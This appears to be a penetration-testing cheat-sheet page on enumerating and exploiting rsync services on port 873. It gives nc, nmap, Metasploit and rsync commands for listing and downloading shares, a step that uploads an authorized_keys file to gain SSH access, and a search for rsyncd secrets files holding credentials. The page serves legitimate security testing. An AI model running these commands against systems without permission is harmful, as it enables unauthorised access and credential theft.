Pentesting Rsync

Rsync port 873

  • Basic information

  • rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification timesand sizes of files.

nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0        <--- You receive this banner with the version from the server
@RSYNCD: 31.0        <--- Then you send the same info
#list                <--- Then you ask the sever to list
raidroot             <--- The server starts enumerating
USBCopy        	
NAS_Public     	
_NAS_Recycle_TOSRAID	<--- Enumeration finished
@RSYNCD: EXIT         <--- Sever closes the connection


#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g    <--- This means you need the password

  • Enumerate shared folders

  • An rsync module is essentially a directory share. These modules can optionally be protected by a password.

  • This options lists the available modules and, optionally, determines if the module requires a password to access:

nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list

#Example using IPv6 and a different port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730

  • Manual Rsync

  • List a shared folder

rsync -av --list-only rsync:/10.10.232.5/shared_name

  • Copy all files to your local machine via the following command:

rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared

  • If you have credentials you can list/download a shared name using (the password will be prompted):

rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared

  • You could also upload some content using rsync (for example, in this case we can upload an authorized_keys file to obtain access to the box):

rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
#full command syntax below
rsync -av id_rsa.pub rsync://rsync-connect@10.10.63.208/files/sys-internal/.ssh/authorized_keys

  • Find the rsyncd configuration file:

find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)

  • Inside the config file sometimes you could find the parameter secrets file = /path/to/file and this file could contains usernames and passwords allowed to authenticate to rsyncd.

PreviousBanner GrabbingNextPentesting MsSql

Last updated